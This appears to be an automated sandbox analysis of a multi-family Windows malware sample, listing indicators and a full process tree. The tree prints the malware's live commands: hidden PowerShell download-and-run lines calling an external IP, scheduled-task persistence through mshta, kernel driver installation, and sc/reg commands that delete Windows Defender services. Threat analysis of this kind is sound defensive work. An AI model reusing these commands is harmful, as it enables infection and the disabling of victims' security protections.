description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language i4cwegu.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CMD.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 36c97fadf5.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language but2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2025-04-04_13cefe1fe0ec8a50500e8077af765a55_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 262.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Yhihb8G.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7IIl2eE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Passwords.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 72551f9bea.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language chcp.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language extrac32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1e9b491d42.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost015.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language 43f9a4e9b0.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language larBxd7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ddff17fe91.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost015.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language qhjMWht.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 43f9a4e9b0.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language chcp.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language UZPt0hR.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language apple.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language c390a85ab1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Jordan.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 9sWdA2p.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language choice.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language choice.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rm3cVPI.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 1980 cmd.exe 1472 netsh.exe -
Checks processor information in registry 2 TTPs 20 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 Yhihb8G.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier Yhihb8G.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe -
Delays execution with timeout.exe 2 IoCs
pid Process 5028 timeout.exe 6184 timeout.exe -
Kills process with taskkill 5 IoCs
pid Process 3344 taskkill.exe 2352 taskkill.exe 3408 taskkill.exe 1012 taskkill.exe 4792 taskkill.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000_Classes\Local Settings firefox.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1168 schtasks.exe 876 schtasks.exe 3284 schtasks.exe 5716 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 232 powershell.exe 232 powershell.exe 5016 Temp9K1HSKWQKABH0THSTVA22AAFUTPAK4FR.EXE 5016 Temp9K1HSKWQKABH0THSTVA22AAFUTPAK4FR.EXE 4604 rapes.exe 4604 rapes.exe 6104 powershell.exe 6104 powershell.exe 6104 powershell.exe 2956 TempJXWR3GY9NFCSDEPRFXDF8UDMD8L0ZHFB.EXE 2956 TempJXWR3GY9NFCSDEPRFXDF8UDMD8L0ZHFB.EXE 4704 rapes.exe 4704 rapes.exe 5588 ddff17fe91.exe 5588 ddff17fe91.exe 5588 ddff17fe91.exe 5588 ddff17fe91.exe 5588 ddff17fe91.exe 5588 ddff17fe91.exe 4760 ca1bffd716.exe 4760 ca1bffd716.exe 1896 72551f9bea.exe 1896 72551f9bea.exe 1896 72551f9bea.exe 1896 72551f9bea.exe 1896 72551f9bea.exe 1896 72551f9bea.exe 5340 43f9a4e9b0.exe 5340 43f9a4e9b0.exe 5340 43f9a4e9b0.exe 5340 43f9a4e9b0.exe 404 c390a85ab1.exe 404 c390a85ab1.exe 404 c390a85ab1.exe 404 c390a85ab1.exe 404 c390a85ab1.exe 2800 qhjMWht.exe 2800 qhjMWht.exe 2800 qhjMWht.exe 2800 qhjMWht.exe 2800 qhjMWht.exe 2800 qhjMWht.exe 3784 MSBuild.exe 3784 MSBuild.exe 3784 MSBuild.exe 3784 MSBuild.exe 2352 rapes.exe 2352 rapes.exe 5748 Yhihb8G.exe 5748 Yhihb8G.exe 5748 Yhihb8G.exe 5456 Jordan.com 5456 Jordan.com 5456 Jordan.com 5456 Jordan.com 5456 Jordan.com 5456 Jordan.com 2492 9sWdA2p.exe 2492 9sWdA2p.exe 2492 9sWdA2p.exe 2492 9sWdA2p.exe 2492 9sWdA2p.exe 2492 9sWdA2p.exe 4448 MSBuild.exe -
Suspicious behavior: LoadsDriver 2 IoCs
pid Process 660 Process not Found 660 Process not Found -
Suspicious behavior: MapViewOfSection 3 IoCs
pid Process 4624 UZPt0hR.exe 4624 UZPt0hR.exe 4624 UZPt0hR.exe -
Suspicious use of AdjustPrivilegeToken 16 IoCs
description pid Process Token: SeDebugPrivilege 232 powershell.exe Token: SeDebugPrivilege 6104 powershell.exe Token: SeDebugPrivilege 3344 taskkill.exe Token: SeDebugPrivilege 2352 taskkill.exe Token: SeDebugPrivilege 3408 taskkill.exe Token: SeDebugPrivilege 1012 taskkill.exe Token: SeDebugPrivilege 4792 taskkill.exe Token: SeDebugPrivilege 5916 firefox.exe Token: SeDebugPrivilege 5916 firefox.exe Token: SeDebugPrivilege 404 c390a85ab1.exe Token: SeDebugPrivilege 4536 tasklist.exe Token: SeDebugPrivilege 3748 tasklist.exe Token: SeDebugPrivilege 5748 Yhihb8G.exe Token: SeDebugPrivilege 3768 powershell.exe Token: SeDebugPrivilege 5516 tasklist.exe Token: SeDebugPrivilege 1012 tasklist.exe -
Suspicious use of FindShellTrayWindow 41 IoCs
pid Process 2052 2025-04-04_13cefe1fe0ec8a50500e8077af765a55_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 2052 2025-04-04_13cefe1fe0ec8a50500e8077af765a55_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 2052 2025-04-04_13cefe1fe0ec8a50500e8077af765a55_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 1032 36c97fadf5.exe 1032 36c97fadf5.exe 1032 36c97fadf5.exe 5340 43f9a4e9b0.exe 5340 43f9a4e9b0.exe 5340 43f9a4e9b0.exe 5340 43f9a4e9b0.exe 5340 43f9a4e9b0.exe 5340 43f9a4e9b0.exe 5340 43f9a4e9b0.exe 5916 firefox.exe 5916 firefox.exe 5916 firefox.exe 5916 firefox.exe 5916 firefox.exe 5916 firefox.exe 5916 firefox.exe 5916 firefox.exe 5340 43f9a4e9b0.exe 5916 firefox.exe 5916 firefox.exe 5916 firefox.exe 5916 firefox.exe 5916 firefox.exe 5916 firefox.exe 5916 firefox.exe 5916 firefox.exe 5916 firefox.exe 5340 43f9a4e9b0.exe 5916 firefox.exe 5340 43f9a4e9b0.exe 5340 43f9a4e9b0.exe 5456 Jordan.com 5456 Jordan.com 5456 Jordan.com 4788 Passwords.com 4788 Passwords.com 4788 Passwords.com -
Suspicious use of SendNotifyMessage 35 IoCs
pid Process 2052 2025-04-04_13cefe1fe0ec8a50500e8077af765a55_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 2052 2025-04-04_13cefe1fe0ec8a50500e8077af765a55_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 2052 2025-04-04_13cefe1fe0ec8a50500e8077af765a55_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 1032 36c97fadf5.exe 1032 36c97fadf5.exe 1032 36c97fadf5.exe 5340 43f9a4e9b0.exe 5340 43f9a4e9b0.exe 5340 43f9a4e9b0.exe 5340 43f9a4e9b0.exe 5340 43f9a4e9b0.exe 5340 43f9a4e9b0.exe 5340 43f9a4e9b0.exe 5916 firefox.exe 5916 firefox.exe 5916 firefox.exe 5916 firefox.exe 5340 43f9a4e9b0.exe 5916 firefox.exe 5916 firefox.exe 5916 firefox.exe 5916 firefox.exe 5916 firefox.exe 5916 firefox.exe 5916 firefox.exe 5916 firefox.exe 5340 43f9a4e9b0.exe 5340 43f9a4e9b0.exe 5340 43f9a4e9b0.exe 5456 Jordan.com 5456 Jordan.com 5456 Jordan.com 4788 Passwords.com 4788 Passwords.com 4788 Passwords.com -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 5916 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2052 wrote to memory of 212 2052 2025-04-04_13cefe1fe0ec8a50500e8077af765a55_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 88 PID 2052 wrote to memory of 212 2052 2025-04-04_13cefe1fe0ec8a50500e8077af765a55_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 88 PID 2052 wrote to memory of 212 2052 2025-04-04_13cefe1fe0ec8a50500e8077af765a55_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 88 PID 2052 wrote to memory of 1780 2052 2025-04-04_13cefe1fe0ec8a50500e8077af765a55_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 89 PID 2052 wrote to memory of 1780 2052 2025-04-04_13cefe1fe0ec8a50500e8077af765a55_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 89 PID 2052 wrote to memory of 1780 2052 2025-04-04_13cefe1fe0ec8a50500e8077af765a55_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 89 PID 212 wrote to memory of 1168 212 cmd.exe 91 PID 212 wrote to memory of 1168 212 cmd.exe 91 PID 212 wrote to memory of 1168 212 cmd.exe 91 PID 1780 wrote to memory of 232 1780 mshta.exe 93 PID 1780 wrote to memory of 232 1780 mshta.exe 93 PID 1780 wrote to memory of 232 1780 mshta.exe 93 PID 232 wrote to memory of 5016 232 powershell.exe 100 PID 232 wrote to memory of 5016 232 powershell.exe 100 PID 232 wrote to memory of 5016 232 powershell.exe 100 PID 5016 wrote to memory of 4604 5016 Temp9K1HSKWQKABH0THSTVA22AAFUTPAK4FR.EXE 103 PID 5016 wrote to memory of 4604 5016 Temp9K1HSKWQKABH0THSTVA22AAFUTPAK4FR.EXE 103 PID 5016 wrote to memory of 4604 5016 Temp9K1HSKWQKABH0THSTVA22AAFUTPAK4FR.EXE 103 PID 4604 wrote to memory of 1032 4604 rapes.exe 107 PID 4604 wrote to memory of 1032 4604 rapes.exe 107 PID 4604 wrote to memory of 1032 4604 rapes.exe 107 PID 1032 wrote to memory of 3948 1032 36c97fadf5.exe 108 PID 1032 wrote to memory of 3948 1032 36c97fadf5.exe 108 PID 1032 wrote to memory of 3948 1032 36c97fadf5.exe 108 PID 1032 wrote to memory of 5524 1032 36c97fadf5.exe 109 PID 1032 wrote to memory of 5524 1032 36c97fadf5.exe 109 PID 1032 wrote to memory of 5524 1032 36c97fadf5.exe 109 PID 3948 wrote to memory of 876 3948 cmd.exe 111 PID 3948 wrote to memory of 876 3948 cmd.exe 111 PID 3948 wrote to memory of 876 3948 cmd.exe 111 PID 5524 wrote to memory of 6104 5524 mshta.exe 112 PID 5524 wrote to memory of 6104 5524 mshta.exe 112 PID 5524 wrote to memory of 6104 5524 mshta.exe 112 PID 6104 wrote to memory of 2956 6104 powershell.exe 114 PID 6104 wrote to memory of 2956 6104 powershell.exe 114 PID 6104 wrote to memory of 2956 6104 powershell.exe 114 PID 4604 wrote to memory of 5588 4604 rapes.exe 116 PID 4604 wrote to memory of 5588 4604 rapes.exe 116 PID 4604 wrote to memory of 5588 4604 rapes.exe 116 PID 4604 wrote to memory of 5640 4604 rapes.exe 117 PID 4604 wrote to memory of 5640 4604 rapes.exe 117 PID 4604 wrote to memory of 5640 4604 rapes.exe 117 PID 5640 wrote to memory of 1504 5640 apple.exe 118 PID 5640 wrote to memory of 1504 5640 apple.exe 118 PID 5640 wrote to memory of 1504 5640 apple.exe 118 PID 1504 wrote to memory of 5040 1504 262.exe 120 PID 1504 wrote to memory of 5040 1504 262.exe 120 PID 5040 wrote to memory of 5332 5040 cmd.exe 122 PID 5040 wrote to memory of 5332 5040 cmd.exe 122 PID 5040 wrote to memory of 5332 5040 cmd.exe 122 PID 5332 wrote to memory of 2696 5332 262.exe 123 PID 5332 wrote to memory of 2696 5332 262.exe 123 PID 2696 wrote to memory of 5008 2696 cmd.exe 125 PID 2696 wrote to memory of 5008 2696 cmd.exe 125 PID 2696 wrote to memory of 2256 2696 cmd.exe 126 PID 2696 wrote to memory of 2256 2696 cmd.exe 126 PID 2696 wrote to memory of 5028 2696 cmd.exe 127 PID 2696 wrote to memory of 5028 2696 cmd.exe 127 PID 2696 wrote to memory of 4992 2696 cmd.exe 128 PID 2696 wrote to memory of 4992 2696 cmd.exe 128 PID 2696 wrote to memory of 5580 2696 cmd.exe 129 PID 2696 wrote to memory of 5580 2696 cmd.exe 129 PID 2696 wrote to memory of 112 2696 cmd.exe 130 PID 2696 wrote to memory of 112 2696 cmd.exe 130 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Yhihb8G.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Yhihb8G.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\2025-04-04_13cefe1fe0ec8a50500e8077af765a55_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"C:\Users\Admin\AppData\Local\Temp\2025-04-04_13cefe1fe0ec8a50500e8077af765a55_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2052 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn EkBgjma9waz /tr "mshta C:\Users\Admin\AppData\Local\Temp\OqcW9KPBU.hta" /sc minute /mo 25 /ru "Admin" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:212 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn EkBgjma9waz /tr "mshta C:\Users\Admin\AppData\Local\Temp\OqcW9KPBU.hta" /sc minute /mo 25 /ru "Admin" /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1168
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\OqcW9KPBU.hta2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1780 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'9K1HSKWQKABH0THSTVA22AAFUTPAK4FR.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:232 -
C:\Users\Admin\AppData\Local\Temp9K1HSKWQKABH0THSTVA22AAFUTPAK4FR.EXE"C:\Users\Admin\AppData\Local\Temp9K1HSKWQKABH0THSTVA22AAFUTPAK4FR.EXE"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:5016 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4604 -
C:\Users\Admin\AppData\Local\Temp\10444930101\36c97fadf5.exe"C:\Users\Admin\AppData\Local\Temp\10444930101\36c97fadf5.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1032 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn M4UzAmay1nw /tr "mshta C:\Users\Admin\AppData\Local\Temp\XaGsFGEWM.hta" /sc minute /mo 25 /ru "Admin" /f7⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3948 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn M4UzAmay1nw /tr "mshta C:\Users\Admin\AppData\Local\Temp\XaGsFGEWM.hta" /sc minute /mo 25 /ru "Admin" /f8⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:876
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\XaGsFGEWM.hta7⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5524 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'JXWR3GY9NFCSDEPRFXDF8UDMD8L0ZHFB.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:6104 -
C:\Users\Admin\AppData\Local\TempJXWR3GY9NFCSDEPRFXDF8UDMD8L0ZHFB.EXE"C:\Users\Admin\AppData\Local\TempJXWR3GY9NFCSDEPRFXDF8UDMD8L0ZHFB.EXE"9⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2956
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10444940101\ddff17fe91.exe"C:\Users\Admin\AppData\Local\Temp\10444940101\ddff17fe91.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5588
-
-
C:\Users\Admin\AppData\Local\Temp\10444950101\apple.exe"C:\Users\Admin\AppData\Local\Temp\10444950101\apple.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5640 -
C:\Users\Admin\AppData\Local\Temp\262.exe"C:\Users\Admin\AppData\Local\Temp\262.exe"7⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1504 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\D774.tmp\D775.tmp\D776.bat C:\Users\Admin\AppData\Local\Temp\262.exe"8⤵
- Suspicious use of WriteProcessMemory
PID:5040 -
C:\Users\Admin\AppData\Local\Temp\262.exe"C:\Users\Admin\AppData\Local\Temp\262.exe" go9⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5332 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\D86E.tmp\D86F.tmp\D870.bat C:\Users\Admin\AppData\Local\Temp\262.exe go"10⤵
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:2696 -
C:\Windows\system32\sc.exesc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"11⤵
- Launches sc.exe
PID:5008
-
-
C:\Windows\system32\sc.exesc start ddrver11⤵
- Launches sc.exe
PID:2256
-
-
C:\Windows\system32\timeout.exetimeout /t 111⤵
- Delays execution with timeout.exe
PID:5028
-
-
C:\Windows\system32\sc.exesc stop ddrver11⤵
- Launches sc.exe
PID:4992
-
-
C:\Windows\system32\sc.exesc start ddrver11⤵
- Launches sc.exe
PID:5580
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y11⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:112
-
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t11⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5060
-
-
C:\Windows\system32\sc.exesc stop "WinDefend"11⤵
- Launches sc.exe
PID:5520
-
-
C:\Windows\system32\sc.exesc delete "WinDefend"11⤵
- Launches sc.exe
PID:5540
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f11⤵PID:4900
-
-
C:\Windows\system32\sc.exesc stop "MDCoreSvc"11⤵
- Launches sc.exe
PID:3568
-
-
C:\Windows\system32\sc.exesc delete "MDCoreSvc"11⤵
- Launches sc.exe
PID:1972
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f11⤵PID:232
-
-
C:\Windows\system32\sc.exesc stop "WdNisSvc"11⤵
- Launches sc.exe
PID:3292
-
-
C:\Windows\system32\sc.exesc delete "WdNisSvc"11⤵
- Launches sc.exe
PID:5572
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f11⤵PID:632
-
-
C:\Windows\system32\sc.exesc stop "Sense"11⤵
- Launches sc.exe
PID:5368
-
-
C:\Windows\system32\sc.exesc delete "Sense"11⤵
- Launches sc.exe
PID:5252
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\Sense" /f11⤵PID:2380
-
-
C:\Windows\system32\sc.exesc stop "wscsvc"11⤵
- Launches sc.exe
PID:1212
-
-
C:\Windows\system32\sc.exesc delete "wscsvc"11⤵
- Launches sc.exe
PID:4948
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f11⤵
- Modifies security service
PID:3068
-
-
